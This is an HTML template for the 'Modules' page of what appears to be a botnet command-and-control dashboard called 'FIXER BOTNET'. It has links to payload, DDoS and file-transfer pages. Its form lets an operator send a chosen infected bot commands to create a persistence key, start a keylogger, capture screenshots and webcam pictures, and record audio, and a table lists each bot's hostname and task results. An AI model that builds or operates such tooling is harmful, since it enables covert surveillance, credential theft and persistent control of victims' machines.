<!-- Modules.html -->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="shortcut icon" href="../static/Lion.png" type="image/png">
    <title>FIXER - Dashboard</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
    <div class="sidebar">
        <img src="{{ url_for('static', filename='Lion.png') }}" alt="Logo" class="logo">
        <h1>FIXER BOTNET</h1>
        <a href="{{ url_for('dashboard') }}"><img src="{{ url_for('static', filename='dashboard_icon.png') }}" alt="Dashboard Icon" class="avatar"> DASHBOARD</a>
        <a href="{{ url_for('payload') }}"><img src="{{ url_for('static', filename='payload_icon.png') }}" alt="Payload Icon" class="avatar"> PAYLOAD</a>
        <a href="{{ url_for('modules') }}" class="selected"><img src="{{ url_for('static', filename='modules_icon.png') }}" alt="Modules Icon" class="avatar"> MODULES</a>
        <a href="{{ url_for('commands') }}"><img src="{{ url_for('static', filename='commands_icon.png') }}" alt="Commands Icon" class="avatar"> COMMANDS</a>
        <a href="{{ url_for('ping') }}"><img src="{{ url_for('static', filename='danger_icon.png') }}" alt="DDOS Ping Icon" class="avatar"> DDOS PING</a>
        <a href="{{ url_for('file_transfer') }}"><img src="{{ url_for('static', filename='file_transfer_icon.png') }}" alt="File Transfer Icon" class="avatar"> FILE TRANSFER</a>
        <a href="{{ url_for('logout') }}" class="logout"><img src="{{ url_for('static', filename='logout_icon.png') }}" alt="Logout Icon" class="avatar"> LOGOUT</a>
    </div>
    <div class="form">
        <form id="form" method="post" name="form">
            <label for="idNumber">BOT-ID:</label>
            <input type="number" id="idNumber" name="idNumber" style="width: 450px;" required>
            <label for="command">COMMAND:</label>
            <select id="command" name="command" style="width: 460px;">
                <option value="persistence">Create Persistence Key</option>
                <option value="keylogger">Start Keylogger</option>
                <option value="screenshot">Capture Screenshot</option>
                <option value="picture">Capture Picture</option>
                <option value="audio">Record Audio (5 Seconds)</option>
            </select>
            <button type="submit" id="submit" style="width: 370px;">SEND MODULE</button>
        </form>
    </div>
    <div class="table">
        <table class="table">
            <thead>
                <tr>
                    <th>BOT-ID</th>
                    <th>HOSTNAME</th>
                    <th>COMMAND</th>
                    <th>STATUS</th>
                </tr>
            </thead>
            <tbody id="Module_Output_Status_Table">
                {% for task in tasks[::-1] %}
                    <tr>
                        <td>{{ task.idNumber }}</td>
                        <td>{{ task.hostname | default('N/A') }}</td>
                        <td>{{ task.command }}</td>
                        <td>{{ task.result }}</td>
                    </tr>
                {% endfor %}        
            </tbody>
        </table>
    </div>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script>
        $(document).ready(function() {
            $("#keylogger").click(function() {      $("#command").val("keylogger");     });
            $("#persistence").click(function() {    $("#command").val("persistence");   });
            $("#screenshot").click(function() {     $("#command").val("screenshot");    });
            $("#picture").click(function() {        $("#command").val("picture");       });
            $("#audio").click(function() {          $("#command").val("audio");         });
            $("#submit").click(function() {         $("#form").submit();                });
        });
        setInterval(function () { window.location.href = window.location.origin + window.location.pathname; }, 15000);
    </script>
</body>
</html>
